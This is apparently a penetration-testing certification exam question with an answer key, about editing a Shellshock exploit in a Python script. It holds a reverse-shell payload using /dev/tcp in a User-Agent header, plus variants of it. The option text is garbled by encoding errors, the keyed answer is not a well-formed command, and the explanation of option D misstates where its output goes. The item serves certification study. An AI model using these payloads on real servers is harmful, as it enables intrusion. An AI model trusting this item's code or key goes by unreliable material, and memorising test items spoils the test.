CompTIA PenTest+ (PT0-002) — Question 423

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Answer options

• A. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
• B. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
• C. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
• D. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€ ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

Correct answer: A

Explanation

Option A is correct because using 'id;whoami' will return the user context in which the server is running. Option B attempts to find files with the SUID bit set, which does not directly reveal the user context. Option C uses 'ps -ef', which lists processes but does not specifically identify the user context of the server. Option D redirects output to the attacker's machine rather than determining the user context.